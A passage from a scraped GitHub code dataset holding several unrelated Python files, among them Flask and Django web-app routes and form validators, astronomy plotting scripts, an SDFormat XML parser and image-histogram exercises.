page_not_found(e, loggedInInfo):\n return render_template('/error/404.html', errorStr=e, isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email']), 404\n\n@app.errorhandler(405)\n@logged_in\ndef method_not_allowed(e, loggedInInfo):\n return render_template('/error/405.html', errorStr=e, isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email']), 405\n\n\n@app.route('/update_list', methods=['POST'])\n@requires_auth\ndef update_list():\n user = str(session['profile']['user_id'])\n id = request.form['media_id']\n start = request.form['start']\n end = request.form['end']\n db.update_list_db(user, id, start, end)\n return redirect(url_for('profile'))\n\n@app.route('/remove_from_list', methods=['POST'])\n@requires_auth\ndef remove_from_list():\n user = str(session['profile']['user_id'])\n id = request.form['mediaID']\n if (request.form['addedList'] == \"Want to Watch\"):\n start = \"will_watch\"\n else:\n start = request.form['addedList'].lower()\n current_app.logger.info(\"attempting to delete \" + id + \" from \" + start)\n end = \"delete\"\n db.update_list_db(user, id, start, end)\n return redirect(session['return_url'])\n\n\n@app.route('/update_bio', methods=['POST'])\n@requires_auth\ndef update_bio():\n bio_text=request.form.get('bio')\n user_id = str(session['profile']['user_id'])\n db.update_bio(user_id, bio_text)\n return redirect(url_for('profile'))\n\n\n@app.route('/user/', methods=['GET'])\n@logged_in\ndef publicProfile(user_id, loggedInInfo):\n if (len(db.get_user_by_id(user_id)) == 0):\n abort(404, description=\"User ID: \" + user_id + \" not found\")\n\n if (not loggedInInfo['isLoggedIn'] or session['profile']['user_id'] != user_id): #if user is not logged in or if user is not accessing their own user page\n session['return_url'] = request.url\n\n watched = db.get_user_media_for_list(str(user_id), \"watched\")\n watched_info = []\n for i in range(len(watched)):\n info = {}\n\n media = db.get_media_by_id(watched[i])\n info['id'] = watched[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watched[i]\n\n watched_info.append(info)\n\n watching = db.get_user_media_for_list(str(user_id), \"watching\")\n watching_info = []\n for i in range(len(watching)):\n info = {}\n\n media = db.get_media_by_id(watching[i])\n info['id'] = watching[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watching[i]\n\n watching_info.append(info)\n\n will_watch = db.get_user_media_for_list(str(user_id), \"will_watch\")\n will_watch_info = []\n for i in range(len(will_watch)):\n info = {}\n\n media = db.get_media_by_id(will_watch[i])\n info['id'] = will_watch[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + will_watch[i]\n\n will_watch_info.append(info)\n\n user_profile = db.get_user_by_id(str(user_id))\n\n is_followed = False\n if (loggedInInfo['isLoggedIn']):\n followees = db.get_followee_ids_by_user_id(session['profile']['user_id'])\n if (user_profile[0]['user_id'] in followees):\n is_followed = True\n\n return render_template('publicProfile.html', watched_info=watched_info, watching_info=watching_info, will_watch_info=will_watch_info, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], user_profile=user_profile, is_followed=is_followed)\n\n else: #if user is trying to access their own user page, redirect to profile\n return redirect(url_for('profile'))\n \n@app.route('/following')\n@logged_in\n@requires_auth\ndef following(loggedInInfo):\n session['return_url'] = request.url\n followees = db.get_followees_by_user_id_sorted_by_username(session['profile']['user_id'])\n # followees = db.get_users_by_ids(followees)\n\n return render_template('following.html', isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], \\\n followees=followees)\n\n@app.route('/add_new_follow', methods=['POST'])\n@requires_auth\ndef add_new_follow():\n followee_id = request.form.get('followee')\n db.add_new_follow(session['profile']['user_id'], followee_id)\n return redirect(session['return_url'])\n\n@app.route('/unfollow', methods=['POST'])\n@requires_auth\ndef unfollow():\n followee_id = request.form.get('followee')\n db.unfollow(session['profile']['user_id'], followee_id)\n return redirect(session['return_url'])\n\n# @app.route('/parent')\n# def parent():\n# return render_template('parent.html')\n\n\n","repo_name":"hamma212/movie-watchlist-sharing","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":20214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16575022365","text":"from django import forms\nfrom project.pinnmodels import UmOscAllActiveAcctNbrsV, UmOscServiceProfileV\nfrom oscauth.utils import get_mc_group, get_mc_user\nfrom oscauth.models import AuthUserDept\n\nfrom project.models import validate_shortcode\n\nfrom django.core.exceptions import ValidationError\n\n\nclass Phone(forms.CharField):\n template_name = 'project/text.html'\n widget=forms.TextInput(attrs={'class': 'form-control'})\n\n def validate(self, value):\n value = value.replace('-','')\n locations = list(UmOscServiceProfileV.objects.filter(service_number=value).exclude(location_id=0).values())\n\n if locations:\n authorized_departments = AuthUserDept.get_order_departments(self.current_user)\n phone_dept = locations[0]['deptid']\n authorized = False\n\n for dept in authorized_departments:\n if dept.dept == phone_dept:\n authorized = True\n\n if authorized:\n return\n else:\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError(f'You are not authorized for department {phone_dept}', code='shortcode')\n else:\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError('That is not a valid Phone Number', code='shortcode')\n\n\nclass Uniqname(forms.CharField):\n\n template_name = 'project/text.html'\n widget=forms.TextInput(attrs={'class': 'form-control'})\n\n def validate(self, value):\n if not value and not self.required:\n return\n\n user = get_mc_user(value)\n if user:\n return\n else:\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError('That is not a valid uniqname', code='shortcode')\n\n\nclass ShortCode(forms.CharField):\n template_name = 'project/text.html'\n widget=forms.TextInput(attrs={'class': 'form-control'})\n #validators=[validate_shortcode]\n\n #def validate(self, value):\n\n # try:\n # UmOscAllActiveAcctNbrsV.objects.get(short_code=value)\n # except:\n # self.widget.attrs.update({'class': 'form-control is-invalid'})\n # raise ValidationError('That is not a valid shortcode', code='shortcode')\n\n\nclass McGroup(forms.CharField):\n #widget = forms.EmailInput\n #default_validators = [validators.validate_email]\n template_name = 'project/text.html'\n\n widget=forms.TextInput(attrs={'class': 'form-control'})\n\n def validate(self, value):\n\n if not get_mc_group(value):\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError('That is not a valid group in MCommunity', code='mcgroup')\n\n\n\n","repo_name":"ITSComm-Information-Systems/srs","sub_path":"project/forms/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31824261228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as pl\nfrom matplotlib import rcParams\nfrom matplotlib.colors import ListedColormap\n\nfrom astropy.io import fits\n\nfrom archer.config import parser, rectify_config, plot_defaults\nfrom archer.catalogs import rectify, homogenize\nfrom archer.frames import gc_frame_law10, gc_frame_dl17\nfrom archer.plummer import convert_estar_rmax\n\n\ndef show_dlam(cat_r, show, ax=None, colorby=None, randomize=True,\n **scatter_kwargs):\n if randomize:\n rand = np.random.choice(show.sum(), size=show.sum(), replace=False)\n else:\n rand = slice(None)\n rgal = np.sqrt(cat_r[\"x_gal\"]**2 + cat_r[\"y_gal\"]**2 + cat_r[\"z_gal\"]**2)\n #rgal = cat_r[\"dist\"]\n cb = ax.scatter(cat_r[show][rand][\"lambda\"], rgal[show][rand],\n c=colorby[show][rand], **scatter_kwargs)\n return ax, cb\n\n\nif __name__ == \"__main__\":\n\n zcut = -1.9\n config = rectify_config(parser.parse_args())\n rtype = config.rcat_type\n\n # rcat\n rcat = fits.getdata(config.rcat_file)\n rcat_r = rectify(homogenize(rcat, rtype, gaia_vers=config.gaia_vers), config.gc_frame)\n\n # lm10\n lm10 = fits.getdata(config.lm10_file)\n lm10_r = rectify(homogenize(lm10, \"LM10\"), gc_frame_law10)\n rmax, energy = convert_estar_rmax(lm10[\"estar\"])\n\n # dl17\n dl17 = fits.getdata(config.dl17_file)\n dl17_r = rectify(homogenize(dl17, \"DL17\"), gc_frame_dl17)\n\n # selections\n from make_selection import rcat_select\n good, sgr = rcat_select(rcat, rcat_r, max_rank=config.max_rank,\n dly=config.dly, flx=config.flx)\n unbound = lm10[\"tub\"] > 0\n\n # plot setup\n rcParams = plot_defaults(rcParams)\n text = [0.9, 0.1]\n bbox = dict(facecolor='white')\n zmin, zmax = -2, -0.1\n ncol = 3\n figsize = (11, 9.5)\n fig = pl.figure(figsize=figsize)\n from matplotlib.gridspec import GridSpec\n gs = GridSpec(ncol, 1, height_ratios=ncol * [10],\n left=0.1, right=0.87, hspace=0.2, top=0.93)\n gsc = GridSpec(ncol, 1, left=0.89, right=0.9, hspace=0.2, top=0.93)\n #bottom=0.89, top=0.95)\n vlaxes = []\n\n # --- plot H3 ----\n vlaxes.append(fig.add_subplot(gs[0, 0]))\n ax = vlaxes[-1]\n show = good & sgr\n ax, cbh = show_dlam(rcat_r, show, ax=ax, colorby=rcat[\"feh\"],\n vmin=zmin, vmax=zmax, cmap=\"magma\",\n marker='o', s=4, alpha=1.0, zorder=2, linewidth=0)\n ax.text(text[0], text[1], \"H3 Giants\", transform=ax.transAxes, bbox=bbox)\n # highlight low feh\n show = good & sgr & (rcat[\"FeH\"] < zcut)\n ax, cbh = show_dlam(rcat_r, show, ax=ax, colorby=rcat[\"feh\"],\n vmin=zmin, vmax=zmax, cmap=\"magma\",\n marker='o', s=9, alpha=1.0, zorder=3, linewidth=0,)\n #label=\"[Fe/H] < {}\".format(zcut))\n\n # --- LM10 Mocks ---\n ax = fig.add_subplot(gs[1, 0], sharey=vlaxes[0], sharex=vlaxes[0])\n vlaxes.append(ax)\n colorby, cname = 0.66*0.85*rmax, r\"$\\hat{\\rm R}_{\\rm prog}$ (kpc)\" #r\"typical radius ($\\sim 0.66 \\, r_{\\rm max}/r_0$)\"\n vmin, vmax = 0.25, 2.5\n #colorby, cname = lm10[\"Estar\"], r\"E$_\\ast$\"\n #vmin, vmax = 0, 1\n show = unbound\n ax, cbl = show_dlam(lm10_r, show, ax=ax, colorby=colorby,\n vmin=vmin, vmax=vmax, cmap=\"magma_r\",\n marker='o', linewidth=0, alpha=0.5, s=2)\n ax.text(text[0], text[1], \"LM10\\n(noiseless)\", transform=ax.transAxes, bbox=bbox)\n\n # --- DL17 Mock ---\n ax = fig.add_subplot(gs[2, 0], sharey=vlaxes[0], sharex=vlaxes[0])\n vlaxes.append(ax)\n cm = ListedColormap([\"tomato\", \"black\"])\n show = dl17[\"id\"] >= 0\n ax, cbd = show_dlam(dl17_r, show, ax=ax, colorby=dl17[\"id\"],\n vmin=0, vmax=1, cmap=cm, #norm=norm,\n marker='o', linewidth=0, alpha=1.0, s=4)\n\n ax.text(text[0], text[1], \"DL17\\n(noiseless)\", transform=ax.transAxes, bbox=bbox)\n\n # prettify\n [ax.set_xlim(-5, 365) for ax in vlaxes]\n [ax.set_ylim(0, 90) for ax in vlaxes]\n [ax.set_ylabel(r\"$R_{\\rm GC}$ (kpc)\") for ax in vlaxes]\n [ax.set_xlabel(r\"$\\Lambda_{\\rm Sgr}$ (deg)\") for ax in vlaxes[-1:]]\n from matplotlib.lines import Line2D\n points = Line2D([], [], linestyle=\"\", color=\"black\",\n marker=\"o\", markersize=3)\n vlaxes[0].legend([points], [\"[Fe/H] < {}\".format(zcut)], loc=\"upper right\")\n\n # ---- Colorbars ----\n cax1 = fig.add_subplot(gsc[1, -1])\n #pl.colorbar(cb, cax=cax, label=r\"$t_{unbound}$ (Gyr)\")\n pl.colorbar(cbl, cax=cax1, label=cname)\n cax2 = fig.add_subplot(gsc[0, -1])\n pl.colorbar(cbh, cax=cax2, label=r\"[Fe/H]\")\n cax3 = fig.add_subplot(gsc[2, -1])\n pl.colorbar(cbd, cax=cax3, label=r\"\", ticks=[0.25, 0.75])\n cax3.set_yticklabels([\"Stars\", \"DM\"])\n\n if config.savefig:\n fig.savefig(\"{}/dist_lambda_mocks.{}\".format(config.figure_dir, config.figure_extension),\n dpi=config.figure_dpi)\n","repo_name":"bd-j/archer","sub_path":"plotting/dist_lambda_mocks.py","file_name":"dist_lambda_mocks.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"32599992670","text":"\ndef detectCapitalUse(word: str) -> bool:\n flag = True\n upperflag = False\n first_letter = word[0]\n last_letter = word[len(word)-1]\n if first_letter.isupper() and last_letter.isupper() or first_letter.islower() and last_letter.islower():\n upperflag = True\n for letter in word:\n print(letter)\n return flag\n","repo_name":"lukkelele/python","sub_path":"leetcode/detect_capital.py","file_name":"detect_capital.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73223432449","text":"'''\nFavor colocar as importações em ordem alfabética para uma melhor organização\n'''\n\nfrom ..models import Person\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.urls import reverse_lazy\n\n@login_required\ndef person_delete(request, id):\n person = get_object_or_404(Person, pk=id)\n \n if request.method == 'POST':\n person.delete()\n return redirect(reverse_lazy(\n 'person_list'\n ))\n\n context = {\n 'person': person,\n }\n\n return render(\n request,\n 'person_delete.html',\n context\n )","repo_name":"flavionogueiraa/django_curse","sub_path":"clientes/views/person_delete.py","file_name":"person_delete.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40531167060","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#収束しきってそうなので500で切ってる\navg_rewards = np.load('/Users/koshikawashunpei/Documents/高橋研/JSAI/プロットコード/plot_data/maze_plot_algorithm.npy')[:,:500]\n\n#plot部zZ\nfig, ax = plt.subplots(figsize = [12, 8])\n\n#全体のプロット\n\"\"\"\nlabel = ['ε-greedy', 'RS', 'RS GS interval: 1', 'RS(λ)', 'RS(λ) GS interval: 1']\nfor i in range(5):\n ax.plot(avg_rewards[i], label = label[i])\n\"\"\"\n\n#RS vs RS GSのプロット\n\"\"\"\nax.plot(avg_rewards[1], label = 'RS', color = 'tab:orange')\nax.plot(avg_rewards[2], label = 'RS GS interval: 1', color = 'tab:green')\n\"\"\"\n\n#RS(λ) vs RS(λ) GSのプロット\n\nax.plot(avg_rewards[3], label = 'RS(λ)', color = 'tab:red')\nax.plot(avg_rewards[4], label = 'RS(λ) GS interval: 1', color = 'tab:purple')\n\n\nax.tick_params(axis = 'x', labelsize = 25)\nax.tick_params(axis = 'y', labelsize = 25)\nax.set_title('Maze task', fontsize = 30)\nax.set_xlabel('Episode', fontsize = 30)\nax.set_ylabel('Rewards', fontsize = 30)\nax.legend(loc = 'lower right', fontsize = 30)\n\nplt.show()\n","repo_name":"syunsukeA/GRC","sub_path":"plot_tools/show_maze_plot_algorithm.py","file_name":"show_maze_plot_algorithm.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74254545090","text":"from xml.etree import ElementTree\nfrom xsdata.formats.dataclass import parsers\nfrom xsdata.formats.dataclass.context import XmlContext\nfrom xsdata.formats.dataclass.parsers import XmlParser\nfrom xsdata.formats.dataclass.parsers.config import ParserConfig\nfrom xsdata.formats.dataclass.serializers import XmlSerializer\nfrom xsdata.formats.dataclass.serializers.config import SerializerConfig\nfrom xsdata.formats.dataclass.parsers import handlers\nfrom xsdata.exceptions import ParserError as XSDataParserError\nimport io\nfrom typing import Dict, Callable, Type, TypeVar\nimport importlib\nimport warnings\nfrom .exceptions import ParseError\n\n\nT = TypeVar(\"T\")\n\n# available SDF elements by version\n_parser_roots = {\n \"1.0\": \"..bindings.v10\",\n \"1.2\": \"..bindings.v12\",\n \"1.3\": \"..bindings.v13\",\n \"1.4\": \"..bindings.v14\",\n \"1.5\": \"..bindings.v15\",\n \"1.6\": \"..bindings.v16\",\n \"1.7\": \"..bindings.v17\",\n \"1.8\": \"..bindings.v18\",\n}\n\n# recommended to reuse the same parser context\n# see: https://xsdata.readthedocs.io/en/latest/xml.html\nxml_ctx = XmlContext()\n\n\ndef get_version(sdf: str) -> str:\n \"\"\"Returns the version of a SDF string.\n\n Parameters\n ----------\n sdf : str\n The SDFormat XML to be parsed.\n\n Returns\n -------\n version : str\n A string containing the SDF version, e.g. \"1.8\".\n\n Notes\n -----\n This function only checks the root tag and does not parse the entire string.\n\n Examples\n --------\n .. minigallery:: skbot.ignition.sdformat.get_version\n\n \"\"\"\n\n parser = ElementTree.iterparse(io.StringIO(sdf), events=(\"start\",))\n\n _, root = next(parser)\n\n if root.tag != \"sdf\":\n raise ParseError(\"SDF root element not found.\")\n\n if \"version\" in root.attrib:\n version = root.attrib[\"version\"]\n if version not in _parser_roots.keys():\n raise ParseError(f\"Invalid version: {version}\")\n return root.attrib[\"version\"]\n else:\n raise ParseError(\"SDF doesnt specify a version.\")\n\n\ndef loads(\n sdf: str,\n *,\n version: str = None,\n custom_constructor: Dict[Type[T], Callable] = None,\n handler: str = None,\n):\n \"\"\"Convert an XML string into a sdformat.models tree.\n\n Parameters\n ----------\n sdf : str\n The SDFormat XML to be parsed.\n version : str\n The SDFormat version to use while parsing. If None (default) it will\n automatically determine the version from the element. If specified\n the given version will be used instead.\n custom_constructor : Dict[Type[T], Callable]\n Overwrite the default constructor for a certain model class with\n callable. This is useful for doing pre- or post-initialization of\n bound classes or to replace them entirely.\n handler : str\n The handler that the parser should use when traversing the XML. If\n unspecified the default xsData parser will be used (lxml if it is\n installed, otherwise xml.etree). Possible values are:\n\n \"XmlEventHandler\"\n A xml.etree event-based handler.\n \"LxmlEventHandler\"\n A lxml.etree event-based handler.\n\n Returns\n -------\n SdfRoot : object\n An instance of ``skbot.ignition.models.vXX.Sdf`` where XX corresponds to the\n version of the SDFormat XML.\n\n Notes\n -----\n ``custom_constructure`` is currently disabled and has no effect. It will\n become available with xsData v21.8.\n\n Examples\n --------\n .. minigallery:: skbot.ignition.sdformat.loads\n\n \"\"\"\n\n if custom_constructor is None:\n custom_constructor = dict()\n\n def custom_class_factory(clazz, params):\n if clazz in custom_constructor:\n return custom_constructor[clazz](**params)\n\n return clazz(**params)\n\n if version is None:\n version = get_version(sdf)\n\n if handler in [\"XmlSaxHandler\", \"LxmlSaxHandler\"]:\n warnings.warn(\n \"SAX handlers have been deprecated in xsData >= 21.9;\"\n \" falling back to EventHandler. If you need the SAX handler, please open an issue.\"\n \" To make this warning dissapear change `handler` to the corresponding EventHandler.\",\n DeprecationWarning,\n )\n\n if handler == \"XmlSaxHandler\":\n handler = \"XmlEventHandler\"\n elif handler == \"LxmlSaxHandler\":\n handler = \"LxmlEventHandler\"\n\n handler_class = {\n None: handlers.default_handler(),\n \"XmlEventHandler\": handlers.XmlEventHandler,\n \"LxmlEventHandler\": handlers.LxmlEventHandler,\n }[handler]\n\n binding_location = _parser_roots[version]\n\n bindings = importlib.import_module(binding_location, __name__)\n\n sdf_parser = XmlParser(\n ParserConfig(class_factory=custom_class_factory),\n context=xml_ctx,\n handler=handler_class,\n )\n\n try:\n root_el = sdf_parser.from_string(sdf, bindings.Sdf)\n except XSDataParserError as e:\n raise ParseError(\"Invalid SDFormat XML.\") from e\n\n return root_el\n\n\ndef dumps(root_element, *, format=False) -> str:\n \"\"\"Serialize a SDFormat object to an XML string.\n\n Parameters\n ----------\n root_element : object\n An instance of ``skbot.ignition.models.vXX.Sdf``. XX represents the SDFormat\n version and can be any version currently supported by scikit-bot.\n format : bool\n If true, add indentation and linebreaks to the output to increase human\n readability. If false (default) the entire XML will appear as a single\n line with no spaces between elements.\n\n Returns\n -------\n sdformat_string : str\n A string containing SDFormat XML representing the given input.\n\n Examples\n --------\n .. minigallery:: skbot.ignition.sdformat.dumps\n\n \"\"\"\n serializer = XmlSerializer(config=SerializerConfig(pretty_print=format))\n\n return serializer.render(root_element)\n","repo_name":"FirefoxMetzger/scikit-bot","sub_path":"skbot/ignition/sdformat/sdformat.py","file_name":"sdformat.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"43"} +{"seq_id":"3766307724","text":"from enum import Enum\n\nfrom colour import Color\nfrom scipy.sparse.construct import rand\nfrom utility.color import mix\nimport random\nimport math\n\nclass DefaultColorPallet(Enum):\n USER_COLOR = (\"#45e9ce\",\"#1fbfff\")\n SUBREDDIT_COLOR = \"#e94560\"\n FONT_COLOR =\"#fefefe\"\n BACKGROUND_COLOR =\"#121220\"\n EDGE_COLOR = (\"#3e5c7f\",\"#ff5f1f\")\n\nclass ColorPallet:\n __colors:list[Color]\n def __init__(self, colors: list[Color]) -> None:\n self.__colors = colors\n\n def get(self,idx:int)->Color:\n assert(idx >= 0 and idx < len(self.__colors))\n return self.__colors[idx]\n\n def length(self):\n return len(self.__colors)\n\n @staticmethod\n def random(size: int, make_neon: bool, mix_base: Color = Color(rgb=(1.0,1.0,1.0))):\n colors: list[Color] = []\n \n for _ in range(0,size):\n col = Color(rgb=(random.random(),\n random.random(),\n random.random()))\n col = mix(col,mix_base)\n\n if make_neon:\n h,s,l = col.get_hsl()\n s = random.randint(85,100)/100\n l = random.randint(50,60)/100\n col = Color(hsl=(h,s,l))\n colors.append(col)\n return ColorPallet(colors)\n\n @staticmethod\n def even_dist_hsl_neon(size: int):\n colors: list[Color] = []\n\n step = 0.93 / size\n\n for i in range(0,size):\n h = i * step\n if h > 1.0:\n h = 1.0\n colors.append(Color(hsl=( h, random.randint(85,100)/100, random.randint(50,60)/100))) \n return ColorPallet(colors)\n\n\n","repo_name":"Ignaz503/Socialmedia-Tech-2021","sub_path":"utility/colorpallet.py","file_name":"colorpallet.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27642327960","text":"import torch\n\n\nclass Cppn:\n def __init__(self, genome):\n self._nodes = list(genome.nodes.values())\n self._vertical_nodes = list(genome.vertical_nodes.values())\n self._center_nodes = list(genome.center_nodes.values())\n self._vertical_bias = genome.vertical_bias\n self._horizontal_bias = genome.horizontal_bias\n self._center_bias = genome.center_bias\n\n def get_weights(self, x_in, y_in, x_out, y_out):\n output = torch.zeros_like(x_in)\n for n in self._nodes:\n zx_out = x_out * n.zoom\n zy_out = y_out * n.zoom\n dx = x_in - zx_out\n dy = y_in - zy_out\n d2 = dx * dx + dy * dy\n output += torch.exp(-d2 / n.scale / n.scale) * n.weight\n idx = ((x_out == 0) & (y_out != 0))\n for n in self._vertical_nodes:\n zx_out = x_out * n.zoom\n zy_out = y_out * n.zoom\n dx = x_in - zx_out\n dy = y_in - zy_out\n d2 = dx * dx + dy * dy\n output += torch.exp(-d2 / n.scale / n.scale) * n.weight * idx\n d2 = x_in * x_in + y_in * y_in\n idx = ((x_out == 0) & (y_out == 0))\n for n in self._center_nodes:\n output += torch.exp(-d2 / n.scale / n.scale) * n.weight * idx\n return output\n\n def get_biases(self, x_in, y_in, x_out, y_out):\n output = torch.zeros_like(x_in)\n idx = ((x_out == 0) & (y_out != 0))\n output[idx] = self._vertical_bias.bias\n idx = ((x_out != 0) & (y_out == 0))\n output[idx] = self._horizontal_bias.bias\n idx = ((x_out == 0) & (y_out == 0))\n output[idx] = self._center_bias.bias\n return output\n","repo_name":"ykeuter/flightevo","sub_path":"src/flightevo/cppn.py","file_name":"cppn.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12938701879","text":"import click\nimport peewee\nimport model\nimport sqlite3\nimport utils\n\n@click.group(context_settings={'max_content_width': 400})\n@click.pass_context\ndef cli(ctx):\n pass\n\n\n@cli.command(help=\"Creates database.\")\ndef db():\n model.init()\n\n\n@cli.command(help=\"Executes a raw TEXT analysis of a title.\")\n@click.argument('known_db_path')\n@click.argument('text_path')\ndef raw_analysis(text_path, known_db_path):\n known_db = utils.get_known_db(known_db_path)\n title = utils._generate_title_morphs(text_path, text_path.split(\"/\")[-1])\n title.print_evaluation(known_db)\n\n\n@cli.command(help=\"Looks into folders and files of a path, and creates a morhpdata file based on all. Single-core process\")\n@click.argument('text_path')\n@click.argument('title_name')\n@click.argument('output_folder')\ndef generate_title_morphs(text_path, title_name, output_folder):\n utils.create_morph_file(_generate_title_morphs(\n text_path, title_name), title_name, output_folder)\n\n\n@cli.command(help=\"\"\"\nLooks into folders and files of a path, and creates a morhpdata for each. Each folder is handled as a title. Each file on root level of the collection path is handled as a title. Multi-core process\\n\n\"\"\")\n@click.argument('collection_path')\n@click.argument('output_folder')\ndef generate_collection_morphs(collection_path, output_folder):\n utils._generate_collection_morphs(collection_path, output_folder)\n\n\n@cli.command(help=\"Evaluates the readabity of a single morphdata file.\")\n@click.argument('known_db_path')\n@click.argument('morphdata_path')\ndef evaluate_title_morphs(known_db_path, morphdata_path):\n known_db = utils.get_known_db(known_db_path)\n\n if morphdata_path.endswith(\"morphdata\"):\n title = pickle.load(open(morphdata_path, 'rb'))\n title.print_evaluation(known_db)\n\n\n@cli.command(help=\"Evaluates the readability of all the morphdata files in a single folder.\")\n@click.argument('known_db_path')\n@click.argument('collection_path')\ndef evaluate_collection_morphs(known_db_path, collection_path):\n print(into_csv(utils._evaluate_collection_morphs(collection_path, known_db_path)))\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"noreadingability/readability","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20521004999","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Exercise 1\n\n# In[ ]:\n\n\n# Write a program that asks the user to enter a distance in miles, then converts\n# that distance to Kilometer and present the kilometers.\n# The conversion formula is as follows: Miles=Kilometers×0.6214\n\n\n# In[2]:\n\n\ndef Miles_Converter(): # by using the miles converter function it will display the distance in kilometer for the usuer input distance in miles\n \n miles = float(input(\"ENTER THE VALUE FOR THE DISTANCE IN MILES : \"))\n km = miles / 0.6214\n print (\"THE DISTANCE IN KILOMETER IS: \", km)\n return km\n \n \nMiles_Converter() \n\n","repo_name":"vajeesh/Python","sub_path":"PYTHON_LAB_ASSIGNMENT-1-EXERCISE-1.py","file_name":"PYTHON_LAB_ASSIGNMENT-1-EXERCISE-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24405504845","text":"import matplotlib.pyplot as plt\nfrom skimage import io\nimport numpy as np\nfrom skimage.filters import threshold_otsu\n\n# 1) display the image\nfilename = \"airfield.tif\"\nfilename = io.imread(filename)\nplt.imshow(filename)\nplt.show()\n\n# 2) compute the histogram of the image and plot it\nshape = np.shape(filename)\nhistogram_array = np.zeros(256)\nfor i in range(shape[0]):\n for j in range(shape[1]):\n histogram_index = round(filename[i][j])\n histogram_array[histogram_index] += 1\n\nplt.bar(range(256), histogram_array)\nplt.show()\n\n# 3) Try to make a contrast adjustment and a brightness adjustment by\n# carrying out simple point operations. Look at the effects on the image.\n\n# increasing contrast with 50 %\nfor i in range(shape[0]):\n for j in range(shape[1]):\n filename[i, j] = int(filename[i, j] * 1.5 + 0.5) # +0.5 to round up to int\n if filename[i, j] > 255:\n filename[i, j] = 255\nplt.imshow(filename, cmap='gray')\nplt.show()\n\n# increasing brightness with 20 units\nfor i in range(shape[0]):\n for j in range(shape[1]):\n filename[i, j] = int(filename[i, j] - 20)\n if filename[i, j] > 255:\n filename[i, j] = 255\nplt.imshow(filename, cmap='gray')\nplt.show()\n\n# 4) Carry out a histogram equalisation.\ncumhist = np.zeros(256)\ncumhist[0] = histogram_array[0]\nfor i in range(255):\n cumhist[i+1] = cumhist[i] + histogram_array[i+1]\n\nM = shape[0]\nN = shape[1]\nfor i in range(shape[0]):\n for j in range(shape[1]):\n a = int(filename[i, j])\n b = cumhist[a] * (256 - 1) / (M * N)\n filename[i, j] = b\n\nplt.imshow(filename, 'gray')\nplt.show()\n\n# 5) plot the histogram of the modified image\nnew_histogram_array = np.zeros(256)\nfor i in range(shape[0]):\n for j in range(shape[1]):\n histogram_index = round(filename[i][j])\n new_histogram_array[histogram_index] += 1\n\nplt.bar(range(256), new_histogram_array)\nplt.show()\n\n# 6) Carry out an Otsu threshold on the image\nvarMax = 0\nthreshold = 0\n\nfor i in range(256):\n Bg = histogram_array[:i]\n Fg = histogram_array[i:]\n wB = sum(Bg)/sum(histogram_array)\n wF = sum(Fg)/sum(histogram_array)\n\n if sum(Bg) == 0 or sum(Fg) == 0:\n continue\n\n mB = sum(Bg * range(i))/sum(Bg)\n mF = sum(Fg * range(i, 256))/sum(Fg)\n\n # Calculate Between Class Variance\n varBetween = wB * wF * (mB - mF) * (mB - mF)\n\n if varBetween > varMax:\n varMax = varBetween\n threshold = i\n\nprint(threshold)\n\nimage = \"airfield.tif\"\nimage = io.imread(image)\nthresh = threshold_otsu(image)\nprint(thresh)\n","repo_name":"bardpedersen/INF250","sub_path":"Week 